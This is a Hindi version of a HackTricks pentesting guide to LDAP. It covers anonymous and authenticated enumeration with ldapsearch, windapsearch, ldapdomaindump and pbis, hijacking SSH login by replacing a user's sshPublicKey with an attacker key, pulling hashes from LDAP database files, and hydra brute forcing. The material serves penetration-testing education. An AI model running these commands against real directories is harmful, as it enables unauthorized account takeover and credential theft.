hacktricks/network-services-pentesting/pentesting-ldap.md

389, 636, 3268, 3269 - LDAP का पेंटेस्टिंग

☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

• क्या आप साइबरसिक्योरिटी कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी का विज्ञापन हैकट्रिक्स में दिखाई दे? या क्या आप PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या हैकट्रिक्स को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स देखें!
• The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
• आधिकारिक PEASS & हैकट्रिक्स स्वैग प्राप्त करें
• 💬 डिस्कॉर्ड ग्रुप में शामिल हों या टेलीग्राम ग्रुप या मुझे ट्विटर पर फॉलो करें 🐦@carlospolopm.**
• अपनी हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो और हैकट्रिक्स-क्लाउड रेपो में PRs सबमिट करके.

मूल जानकारी

यहाँ से निकाला गया: https://searchmobilecomputing.techtarget.com/definition/LDAP

LDAP (Lightweight Directory Access Protocol) एक सॉफ्टवेयर प्रोटोकॉल है जो किसी को भी संगठनों, व्यक्तियों, और अन्य संसाधनों जैसे कि फाइलें और उपकरणों को नेटवर्क में स्थित करने की अनुमति देता है, चाहे वह सार्वजनिक इंटरनेट पर हो या किसी कॉर्पोरेट इंट्रानेट पर। LDAP Directory Access Protocol (DAP) का "लाइटवेट" (कम कोड) संस्करण है।

LDAP डायरेक्टरी को कई सर्वरों में वितरित किया जा सकता है। प्रत्येक सर्वर में पूरी डायरेक्टरी का एक प्रतिकृत संस्करण हो सकता है जो समय-समय पर सिंक्रनाइज़ किया जाता है। LDAP सर्वर को Directory System Agent (DSA) कहा जाता है। एक LDAP सर्वर जो उपयोगकर्ता से अनुरोध प्राप्त करता है, वह अनुरोध की जिम्मेदारी लेता है, जरूरत पड़ने पर अन्य DSAs को पास करता है, लेकिन उपयोगकर्ता के लिए एक समन्वित प्रतिक्रिया सुनिश्चित करता है।

LDAP डायरेक्टरी का आयोजन निम्नलिखित स्तरों वाली एक सरल "ट्री" जेरार्की में किया जाता है:

• मूल डायरेक्टरी (पेड़ का प्रारंभिक स्थान या स्रोत), जो शाखाओं में बाहर निकलती है
• देश, प्रत्येक देश शाखाओं में बाहर निकलता है
• संगठन, जो शाखाओं में बाहर निकलते हैं
• संगठनात्मक इकाइयाँ (विभाग, विभाग, आदि), जो शाखाओं में बाहर निकलती है (एक प्रविष्टि शामिल है)
• व्यक्ति (जिसमें लोग, फाइलें, और साझा संसाधन जैसे प्रिंटर शामिल हैं)

डिफ़ॉल्ट पोर्ट: 389 और 636(ldaps)। ग्लोबल कैटलॉग (ActiveDirectory में LDAP) डिफ़ॉल्ट रूप से पोर्ट्स 3268 और LDAPS के लिए 3269 पर उपलब्ध है।

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

LDAP डेटा इंटरचेंज फॉर्मेट

LDIF (LDAP डेटा इंटरचेंज फॉर्मेट) डायरेक्टरी सामग्री को एक सेट के रूप में परिभाषित करता है। यह अपडेट अनुरोधों (Add, Modify, Delete, Rename) का भी प्रतिनिधित्व कर सकता है।

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495

• पंक्तियाँ 1-3 शीर्ष स्तरीय डोमेन local को परिभाषित करती हैं
• पंक्तियाँ 5-8 पहले स्तरीय डोमेन moneycorp (moneycorp.local) को परिभाषित करती हैं
• पंक्तियाँ 10-16 दो संगठनात्मक इकाइयों: dev और sales को परिभाषित करती हैं
• पंक्तियाँ 18-26 एक डोमेन की ऑब्जेक्ट बनाती हैं और उसे मानों के साथ विशेषताएँ असाइन करती हैं

डेटा लिखें

ध्यान दें कि यदि आप मानों को संशोधित कर सकते हैं तो आप वास्तव में दिलचस्प क्रियाएँ कर सकते हैं। उदाहरण के लिए, कल्पना कीजिए कि आप अपने उपयोगकर्ता या किसी भी उपयोगकर्ता की "sshPublicKey" जानकारी बदल सकते हैं। यह बहुत संभावना है कि यदि यह विशेषता मौजूद है, तो ssh LDAP से सार्वजनिक कुंजियों को पढ़ रहा है। यदि आप किसी उपयोगकर्ता की सार्वजनिक कुंजी को संशोधित कर सकते हैं तो आप उस उपयोगकर्ता के रूप में लॉगिन कर पाएंगे भले ही ssh में पासवर्ड प्रमाणीकरण सक्षम न हो।

>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

स्पष्ट पाठ प्रमाणीकरण स्निफ करें

यदि LDAP का उपयोग SSL के बिना किया जाता है, तो आप नेटवर्क में स्पष्ट पाठ में प्रमाणीकरण स्निफ कर सकते हैं।

इसके अलावा, आप LDAP सर्वर और क्लाइंट के बीच नेटवर्क में MITM हमला कर सकते हैं। यहाँ आप Downgrade Attack कर सकते हैं ताकि क्लाइंट स्पष्ट पाठ में प्रमाणीकरण का उपयोग करके लॉगिन करे।

यदि SSL का उपयोग किया जाता है तो आप ऊपर उल्लिखित जैसे MITM करने का प्रयास कर सकते हैं लेकिन एक झूठा प्रमाणपत्र पेश करके, यदि उपयोगकर्ता इसे स्वीकार करता है, तो आप प्रमाणीकरण विधि को Downgrade कर सकते हैं और फिर से प्रमाणीकरण देख सकते हैं।

गुमनाम पहुँच

TLS SNI जाँच को बायपास करें

इस लेखन के अनुसार केवल एक मनमाने डोमेन नाम (जैसे company.com) के साथ LDAP सर्वर तक पहुँचकर वह गुमनाम उपयोगकर्ता के रूप में LDAP सेवा से जानकारी निकालने में सक्षम था:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

LDAP अनाम बाइंड्स

LDAP अनाम बाइंड्स अप्रमाणित हमलावरों को डोमेन से जानकारी प्राप्त करने की अनुमति देते हैं, जैसे कि उपयोगकर्ताओं, समूहों, कंप्यूटरों, उपयोगकर्ता खाता विशेषताओं, और डोमेन पासवर्ड नीति की पूरी सूची। यह एक पुरानी कॉन्फ़िगरेशन है, और Windows Server 2003 के रूप में, केवल प्रमाणित उपयोगकर्ताओं को LDAP अनुरोध शुरू करने की अनुमति है।
हालांकि, व्यवस्थापकों को शायद किसी विशेष एप्लिकेशन को अनाम बाइंड्स की अनुमति देने के लिए सेटअप करना पड़ा होगा और इरादे से अधिक पहुंच दे दी होगी, जिससे अप्रमाणित उपयोगकर्ताओं को AD में सभी ऑब्जेक्ट्स तक पहुंच मिल गई होगी।

मान्य क्रेडेंशियल्स

यदि आपके पास LDAP सर्वर में लॉगिन करने के लिए मान्य क्रेडेंशियल्स हैं, तो आप Domain Admin के बारे में सभी जानकारी डंप कर सकते हैं इसका उपयोग करके:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute Force

सूचीकरण

स्वचालित

इसका उपयोग करके आप सार्वजनिक जानकारी (जैसे डोमेन नाम) देख पाएंगे:

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

पायथन

पायथन के साथ LDAP गणना देखें

आप पायथन का उपयोग करके क्रेडेंशियल्स के साथ या बिना LDAP की गणना करने का प्रयास कर सकते हैं: pip3 install ldap3

सबसे पहले बिना क्रेडेंशियल्स के कनेक्ट करने की कोशिश करें:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

यदि प्रतिक्रिया True है जैसे कि पिछले उदाहरण में, आप LDAP (जैसे कि naming context या domain name) सर्वर से कुछ रोचक डेटा प्राप्त कर सकते हैं:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

एक बार जब आपके पास नामकरण संदर्भ हो, तो आप कुछ और रोमांचक क्वेरीज कर सकते हैं। यह सरल क्वेरी आपको निर्देशिका में सभी ऑब्जेक्ट्स दिखानी चाहिए:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

या dump पूरा ldap:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch **** एक Python स्क्रिप्ट है जो Windows डोमेन से उपयोगकर्ताओं, समूहों, और कंप्यूटरों का पता लगाने में सहायक है, LDAP queries का उपयोग करके।

```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers # Get groups python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups # Get users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Domain Admins python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` ### ldapsearch

नल क्रेडेंशियल्स की जांच करें या यदि आपके क्रेडेंशियल्स मान्य हैं:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

यदि आपको कुछ ऐसा मिलता है जो कहता है कि "bind must be completed" का अर्थ है कि प्रमाण-पत्र गलत हैं।

आप एक डोमेन से सब कुछ निकाल सकते हैं इसका उपयोग करके:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

उपयोगकर्ताओं को निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

निकालें computers:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

मेरी जानकारी निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

डोमेन एडमिन्स की जानकारी निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

डोमेन उपयोगकर्ता निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

निकालें Enterprise Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

निकालें Administrators:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

रिमोट डेस्कटॉप समूह निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

यदि आपके पास किसी पासवर्ड तक पहुँच है तो देखने के लिए आप किसी भी क्वेरी को निष्पादित करने के बाद grep का उपयोग कर सकते हैं:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

कृपया ध्यान दें कि यहाँ पर आपको जो पासवर्ड मिल सकते हैं, वे असली नहीं हो सकते...

pbis

आप pbis को यहाँ से डाउनलोड कर सकते हैं: https://github.com/BeyondTrust/pbis-open/ और यह आमतौर पर /opt/pbis में इंस्टॉल किया जाता है।
Pbis आपको आसानी से मूलभूत जानकारी प्राप्त करने में मदद करता है:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

ग्राफिकल इंटरफेस

Apache Directory

यहां से Apache Directory डाउनलोड करें. इस टूल का उपयोग कैसे करें, इसका एक उदाहरण यहां देखें.

jxplorer

आप यहां एक ग्राफिकल इंटरफेस के साथ LDAP सर्वर डाउनलोड कर सकते हैं: http://www.jxplorer.org/downloads/users.html

डिफ़ॉल्ट रूप से यह /opt/jxplorer में इंस्टॉल होता है।

Godap

आप इसे https://github.com/Macmod/godap में एक्सेस कर सकते हैं।

केर्बेरोस के माध्यम से प्रमाणीकरण

ldapsearch का उपयोग करके आप NTLM के बजाय केर्बेरोस के खिलाफ प्रमाणीकरण कर सकते हैं, -Y GSSAPI पैरामीटर का उपयोग करके।

POST

यदि आप उन फाइलों तक पहुंच सकते हैं जहां डेटाबेस संग्रहीत होते हैं (हो सकता है /var/lib/ldap में हों)। आप हैशेज को निकालने के लिए निम्नलिखित का उपयोग कर सकते हैं:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

विन्यास फ़ाइलें

• सामान्य
• containers.ldif
• ldap.cfg
• ldap.conf
• ldap.xml
• ldap-config.xml
• ldap-realm.xml
• slapd.conf
• IBM SecureWay V3 सर्वर
• V3.sas.oc
• Microsoft Active Directory सर्वर
• msadClassesAttrs.ldif
• Netscape Directory Server 4
• nsslapd.sas_at.conf
• nsslapd.sas_oc.conf
• OpenLDAP डायरेक्टरी सर्वर
• slapd.sas_at.conf
• slapd.sas_oc.conf
• Sun ONE Directory Server 5.1
• 75sas.ldif

HackTricks स्वचालित आदेश

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP).

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे? या क्या आप PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स देखें!
• The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
• आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
• 💬 Discord समूह में शामिल हों या telegram समूह या Twitter पर मुझे फॉलो करें 🐦@carlospolopm.
• अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo और hacktricks-cloud repo में PRs सबमिट करके.